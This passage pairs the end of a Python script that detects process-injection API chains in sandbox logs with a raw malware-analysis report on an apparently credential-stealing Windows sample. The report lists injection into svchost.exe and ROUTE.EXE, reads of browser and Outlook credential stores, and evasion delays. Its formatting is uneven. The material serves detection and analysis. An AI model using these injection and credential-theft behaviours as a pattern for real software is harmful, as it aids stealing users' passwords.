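    r"Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252F30 NtCreateSection,LdrInitializeThunk,7_2_03252F30",
    r"Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252D10 NtMapViewOfSection,LdrInitializeThunk,7_2_03252D10",
    r"Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_03252D30",
    r"Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D44164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00D44164",
    r"Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CDE6A00_2_00CDE6A0",
]


def parse_code_functions(lines):
    """Map 'index:exe' -> set of API names referenced by that process's listed functions."""
    apis_by_proc = defaultdict(set)
    for line in lines:
        m = LINE_RE.search(line.strip())
        if not m:
            continue
        exe = m.group("path").replace("/", "\\").rsplit("\\", 1)[-1]
        bucket = apis_by_proc[f"{m.group('proc')}:{exe}"]   # register even with no APIs
        for name in (m.group("apis") or "").split(","):
            if name.strip():
                bucket.add(name.strip())
    return apis_by_proc


def assess(lines):
    """Per process: the Nt* APIs present and the injection chains they fully form."""
    report = {}
    for key, apis in parse_code_functions(lines).items():
        native = sorted(a for a in apis if a.startswith("Nt"))
        techniques = sorted(t for t, need in TECHNIQUES.items() if need <= apis)
        report[key] = {"native_apis": native, "techniques": techniques}
    return report


if __name__ == "__main__":
    for proc, info in assess(SAMPLE_LINES).items():
        print(proc, "->", ", ".join(info["techniques"]) or "no complete injection chain")
```

On the listing above, svchost.exe carries every chain while ROUTE.EXE (from the subset copied here) only completes section mapping; the original gH3LlhcRzg.exe, whose listed functions are AutoIt GUI and clipboard routines, completes none. Feed the full report listing in to see which processes are the injectors and which are the targets.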
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D3A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00D3A1EF
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D28310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00D28310
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D351BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00D351BD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 034BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 034AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0342B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03475130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03487E54 appears 110 times
Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: String function: 03255130 appears 58 times
Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: String function: 0328EA12 appears 86 times
Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: String function: 03267E54 appears 110 times
Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: String function: 0320B970 appears 280 times
Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: String function: 0329F290 appears 105 times
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: String function: 00CF8900 appears 42 times
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: String function: 00CD7DE1 appears 35 times
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: String function: 00CF0AE3 appears 70 times
Source: gH3LlhcRzg.exe, 00000000.00000003.1393028845.0000000003BF3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs gH3LlhcRzg.exe
Source: gH3LlhcRzg.exe, 00000000.00000003.1394032558.0000000003D9D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs gH3LlhcRzg.exe
Source: gH3LlhcRzg.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@16/9
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D3A06A GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D281CB AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D287E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D3B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D4EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D3C397 CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00CD4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | File created: C:\Users\user\AppData\Local\Temp\aut9649.tmp
Source: gH3LlhcRzg.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ROUTE.EXE, 00000007.00000003.1899061498.0000000002CEB000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3226358408.0000000002D0E000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000003.1896844844.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3226358408.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: gH3LlhcRzg.exe | Virustotal: Detection: 36%
Source: gH3LlhcRzg.exe | ReversingLabs: Detection: 91%
Source: unknown | Process created: C:\Users\user\Desktop\gH3LlhcRzg.exe "C:\Users\user\Desktop\gH3LlhcRzg.exe"
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\gH3LlhcRzg.exe"
Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | Process created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"
Source: C:\Windows\SysWOW64\ROUTE.EXE | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: version.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: gH3LlhcRzg.exeStatic file information: File size 1187328 > 1048576
                Source: gH3LlhcRzg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: gH3LlhcRzg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: gH3LlhcRzg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: gH3LlhcRzg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: gH3LlhcRzg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: gH3LlhcRzg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: gH3LlhcRzg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: route.pdb source: svchost.exe, 00000002.00000003.1678399965.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1711485129.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000006.00000003.1648733208.000000000127B000.00000004.00000020.00020000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000006.00000002.3226874358.0000000001267000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YLmLMhEKNXTfg.exe, 00000006.00000000.1626737870.00000000007AE000.00000002.00000001.01000000.00000005.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000000.1778157226.00000000007AE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: gH3LlhcRzg.exe, 00000000.00000003.1385199866.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, gH3LlhcRzg.exe, 00000000.00000003.1393028845.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1711593848.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1605864959.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1608594134.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1711593848.0000000003400000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000003.1711628069.0000000002E83000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3228296453.00000000031E0000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000003.1713625113.0000000003038000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3228296453.000000000337E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: gH3LlhcRzg.exe, 00000000.00000003.1385199866.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, gH3LlhcRzg.exe, 00000000.00000003.1393028845.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1711593848.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1605864959.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1608594134.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1711593848.0000000003400000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000007.00000003.1711628069.0000000002E83000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3228296453.00000000031E0000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000003.1713625113.0000000003038000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3228296453.000000000337E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ROUTE.EXE, 00000007.00000002.3229283746.000000000380C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3226358408.0000000002C5E000.00000004.00000020.00020000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.0000000002CFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2009532526.000000002794C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: route.pdbGCTL source: svchost.exe, 00000002.00000003.1678399965.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1711485129.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000006.00000003.1648733208.000000000127B000.00000004.00000020.00020000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000006.00000002.3226874358.0000000001267000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: ROUTE.EXE, 00000007.00000002.3229283746.000000000380C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3226358408.0000000002C5E000.00000004.00000020.00020000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.0000000002CFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2009532526.000000002794C000.00000004.80000000.00040000.00000000.sdmp
                Source: gH3LlhcRzg.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: gH3LlhcRzg.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: gH3LlhcRzg.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: gH3LlhcRzg.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: gH3LlhcRzg.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00CD4B37 LoadLibraryA,GetProcAddress, 0_2_00CD4B37
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00CF06FE push es; iretd 0_2_00CF070F
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00CF0710 push es; iretd 0_2_00CF0727
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00CF072A push es; iretd 0_2_00CF0733
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00CF0720 push es; iretd 0_2_00CF0723
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00CF0739 push es; iretd 0_2_00CF0753
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00CF0734 push es; iretd 0_2_00CF0737
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00CF8945 push ecx; ret 0_2_00CF8958
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00CF2BDC push ds; iretd 0_2_00CF2BE2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041716A push es; retf 2_2_0041716F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004141DC push FFFFFFE3h; retf 2_2_004141EE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004141E3 push FFFFFFE3h; retf 2_2_004141EE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403250 push eax; ret 2_2_00403252
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041156C push eax; iretd 2_2_00411575
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413E13 push edi; retf 2_2_00413E1E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00415F26 push esi; iretd 2_2_00415F2A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416F3B push esi; ret 2_2_00416F41
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004137DD pushad ; iretd 2_2_004137EA
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004157FC pushfd ; ret 2_2_004157FD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx 2_2_034309B6
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 7_2_031E225F pushad ; ret 7_2_031E27F9
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 7_2_031E27FA pushad ; ret 7_2_031E27F9
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 7_2_032109AD push ecx; mov dword ptr [esp], ecx 7_2_032109B6
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 7_2_031E283D push eax; iretd 7_2_031E2858
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 7_2_031E1368 push eax; iretd 7_2_031E1369
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 7_2_0072E319 push eax; iretd 7_2_0072E322
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 7_2_0073058A pushad ; iretd 7_2_00730597
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 7_2_007409A3 push ebp; ret 7_2_007409B1
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 7_2_00737682 push edx; ret 7_2_0073768B
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 7_2_0073BCF7 push eax; ret 7_2_0073BD0E
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 7_2_00733CE8 push esi; ret 7_2_00733CEE
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 7_2_00733F17 push es; retf 7_2_00733F1C
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00CD48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00CD48D7
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D55376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00D55376
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00CF3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00CF3187
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | API/Special instruction interceptor: Address: 13C3294
                Source: C:\Windows\SysWOW64\ROUTE.EXE | API/Special instruction interceptor: Address: 7FF90818D324
                Source: C:\Windows\SysWOW64\ROUTE.EXE | API/Special instruction interceptor: Address: 7FF90818D7E4
                Source: C:\Windows\SysWOW64\ROUTE.EXE | API/Special instruction interceptor: Address: 7FF90818D944
                Source: C:\Windows\SysWOW64\ROUTE.EXE | API/Special instruction interceptor: Address: 7FF90818D504
                Source: C:\Windows\SysWOW64\ROUTE.EXE | API/Special instruction interceptor: Address: 7FF90818D544
                Source: C:\Windows\SysWOW64\ROUTE.EXE | API/Special instruction interceptor: Address: 7FF90818D1E4
                Source: C:\Windows\SysWOW64\ROUTE.EXE | API/Special instruction interceptor: Address: 7FF908190154
                Source: C:\Windows\SysWOW64\ROUTE.EXE | API/Special instruction interceptor: Address: 7FF90818DA44
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0347096E rdtsc 2_2_0347096E
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | API coverage: 4.7 %
                Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\ROUTE.EXE | API coverage: 2.6 %
                Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 7988 | Thread sleep count: 41 > 30
                Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 7988 | Thread sleep time: -82000s >= -30000s
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe TID: 8000 | Thread sleep time: -55000s >= -30000s
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe TID: 8000 | Thread sleep time: -33000s >= -30000s
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Last function: Thread delayed
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D3445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00D3445A
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D3C6D1 FindFirstFileW,FindClose, 0_2_00D3C6D1
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D3C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00D3C75C
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D3EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00D3EF95
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D3F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00D3F0F2
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D3F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00D3F3F3
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00D337EF
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D33B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00D33B12
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D3BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00D3BCBC
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 7_2_0073C2C0 FindFirstFileW,FindNextFileW,FindClose, 7_2_0073C2C0
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00CD49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00CD49A0
                Source: Ba4F6400.7.dr | Binary or memory string: dev.azure.comVMware20,11696497155j
                Source: Ba4F6400.7.dr | Binary or memory string: global block list test formVMware20,11696497155
                Source: Ba4F6400.7.dr | Binary or memory string: turbotax.intuit.comVMware20,11696497155t
